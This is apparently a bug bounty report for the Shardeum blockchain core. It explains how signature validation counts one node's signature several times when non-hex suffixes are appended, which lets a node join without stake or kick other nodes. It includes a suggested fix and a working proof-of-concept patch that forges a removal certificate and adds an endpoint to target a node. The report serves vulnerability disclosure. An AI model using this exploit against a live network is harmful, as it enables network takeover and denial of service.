#39679 [BC-Critical] bypass certificate signing validation by double counting signatures
#39679 [BC-Critical] Bypass certificate signing validation by double counting signatures due to ignored suffixes
Submitted on Feb 4th 2025 at 18:39:02 UTC by @Blockian for Audit Comp | Shardeum: Core III
Report ID: #39679
Report Type: Blockchain/DLT
Report severity: Critical
Target: https://github.com/shardeum/shardus-core/tree/bugbounty
Impacts:
Network not being able to confirm new transactions (total network shutdown)
Bypassing Staking Requirements
Description
Impact
Bypass stake certificate validation, allowing for non-staking nodes and network take-over
Bypass nodes removal validation, allowing to remove nodes from the network
Root Cause
The function validateClosestActiveNodeSignatures
counts unique signatures, but double counts duplicate signatures with different suffixes that aren't valid hex characters.
Attack Flow
Staking
Malicious node generates a fake
JoinRequest
with a fakeStakingCertificate
It brute-forces
StakingCertificate
fields to make sure its one of the closest nodes to the hash of the staking certificates. This is easy, as only 1 node is needed to be close.
It creates the full
JoinRequest
, with multiple copies of its signature, instead of signatures from many other nodes, changing only the suffix of the signature with invalid non-hex bytes.It calls
gossip-join-request
Other nodes receive the join request, and validate it using
validateClosestActiveNodeSignatures
.The validation bypasses, as the signatures are valid because non-hex characters are ignored.
The new node joins the network without staking.
Kicking a node
Malicious node generates a fake
RemoveCertificate
.It fills it with multiple copies of its signature, instead of signatures from many other nodes, changing only the suffix of the signature with invalid non-hex bytes.
It calls
remove-by-app
gossip route.Other nodes receive the certificate, and validate it using
validateClosestActiveNodeSignatures
.The validation bypasses, as the signatures are valid because non-hex characters are ignored.
The victim node is kicked from the network.
Deep Dive
The function validateClosestActiveNodeSignatures
uses Crypto.verify
which uses lib-crypto-utils
' verifyObj
which calls verify
which calls ensureBuffer
on the signature which runs
Buffer.from(input, 'hex')
on the signatures, which reads up until the first non-hex character.
Suggested Fix
I suggest to do two think:
Ensure "is-hex" on any payload on any gossip and http endpoint that is supposed to be hex.
Count signers and not signatures.
Severity
This allows to take over the network (by kicking nodes / adding nodes) and so it critical.
In addition, this is the same as 33222
and 34252 which were treated as critical.
Message to the project
I feel like my time was spent roughly 20% on researching, and 80% on trying to create POCs that match your standard or to answer question you give on the reported bugs. I believe there are more bugs to be found in the project, and that the current approach is the reason that bugs keep being found. I suggest you do an invite only competition, without defaultly requesting a POC, and only requesting one if you truly believe there is no bug. This would allow whitehats to actually uncover bugs.
Proof of Concept
POC
Note: this strongly relies on infosec_us_team
's POC for 33222
so thanks to them :)
Both
shardeum
andcore
should be on thebugbounty
branchApply
debug-10-nodes
as stated in the docsApply the following patch on core:
diff --git a/src/shardus/index.ts b/src/shardus/index.ts
index f29206b8..567292be 100644
--- a/src/shardus/index.ts
+++ b/src/shardus/index.ts
@@ -3408,6 +3408,50 @@ class Shardus extends EventEmitter {
isOnStandbyList(publicKey: string): boolean {
return JoinV2.isOnStandbyList(publicKey)
}
+
+ async blockian_gossipRemoveNode(pk: string): Promise<string> {
+ let thenodes = nodeListFromStates([
+ P2P.P2PTypes.NodeStatus.ACTIVE,
+ P2P.P2PTypes.NodeStatus.READY,
+ P2P.P2PTypes.NodeStatus.SYNCING,
+ ]);
+ this.mainLogger.warn(`BLOCKIAN: Trying to disconnect him: ${pk}`)
+ console.log(`BLOCKIAN: Trying to disconnect him: ${pk}`)
+ let certificate: P2P.LostTypes.RemoveCertificate = {
+ nodePublicKey: pk, // Victim node
+ cycle: CycleCreator.currentCycle - 2,
+ };
+ const hash = crypto.hashObj(certificate)
+ const closestNodes = this.getClosestNodes(hash, 6);
+ const closestNodesByPubKey = new Map()
+ for (let i = 0; i < closestNodes.length; i++) {
+ const node = this.p2p.state.getNode(closestNodes[i])
+ if (node) {
+ closestNodesByPubKey.set(node.publicKey, node)
+ }
+ }
+ let ourPublicKey = Self.getPublicNodeInfo(true).publicKey;
+ if (!closestNodesByPubKey.has(ourPublicKey)) {
+ this.mainLogger.warn(`BLOCKIAN: WE ARE NOT in the closest nodes list.`)
+ console.log(`BLOCKIAN: WE ARE NOT in the closest nodes list.`)
+ return "BLOCKIAN: WE ARE NOT in the closest nodes list.";
+ }
+ let oursig = this.crypto.sign(certificate).sign;
+ certificate.signs = Array.from({ length: 9 }, (_, i) => ({
+ owner: oursig.owner,
+ sig: oursig.sig.toLowerCase() + 'z'.repeat(i + 1),
+ }));
+
+ Comms.sendGossip(
+ 'remove-by-app',
+ certificate, // payload
+ 'trackthis', // tracker
+ Self.id, // sender
+ thenodes
+ )
+ console.log(`BLOCKIAN: Final object we are going to send: ${JSON.stringify(certificate)}`);
+ return `Success: Current Quarter ${currentQuarter} (it only works during Quarter 1 and 2 of each cycle)`;
+ }
}
function deepReplace(obj: object | ArrayLike<any>, find: any, replace: any): any {
Apply the following patch on
shardeum
(obviously the logs are just for convenience)
diff --git a/src/index.ts b/src/index.ts
index 22fb7ae9..a39f5e09 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -2378,7 +2378,7 @@ const configShardusEndpoints = (): void => {
})
// endpoint on joining nodes side to receive admin certificate
- shardus.registerExternalPut('admin-certificate', externalApiMiddleware, async (req, res) => {
+ shardus.registerExternalPut('admin-certificate', externalApiMiddleware, async (req: Request, res) => {
try {
nestedCountersInstance.countEvent('shardeum-admin-certificate', 'called PUT admin-certificate')
@@ -2409,6 +2409,13 @@ const configShardusEndpoints = (): void => {
nestedCountersInstance.countEvent('endpoint', 'health-check')
res.sendStatus(200)
})
+
+ shardus.registerExternalGet('blockian_gossipRemoveNode', externalApiMiddleware, async (req, res) => {
+ const pk = req.query.pk as string;
+ console.log(`BLOCKIAN: Target pk: ${pk}`);
+ const result: string = await shardus.blockian_gossipRemoveNode(pk);
+ res.json(`BLOCKIAN: All good. Result: ${result}`);
+ })
}
const configShardusNetworkTransactions = (): void => {
diff --git a/src/shardeum/shardeumFlags.ts b/src/shardeum/shardeumFlags.ts
index de85df9c..2a7221d4 100644
--- a/src/shardeum/shardeumFlags.ts
+++ b/src/shardeum/shardeumFlags.ts
@@ -132,7 +132,7 @@ export const ShardeumFlags: ShardeumFlags = {
contractStoragePrefixBitLength: 3,
contractCodeKeySilo: false,
globalCodeBytes: false,
- VerboseLogs: false,
+ VerboseLogs: true,
debugTraceLogs: false,
Virtual0Address: true,
GlobalNetworkAccount: true,
Run
http://NODE_EXTERNAL_IP:NODE_EXTERNAL_PORT/blockian_gossipRemoveNode/?pk=PUBLIC_KEY_OF_ACTIVE_NODE_WITHIN_YOUR_SHARD_TO_KICK
Was this helpful?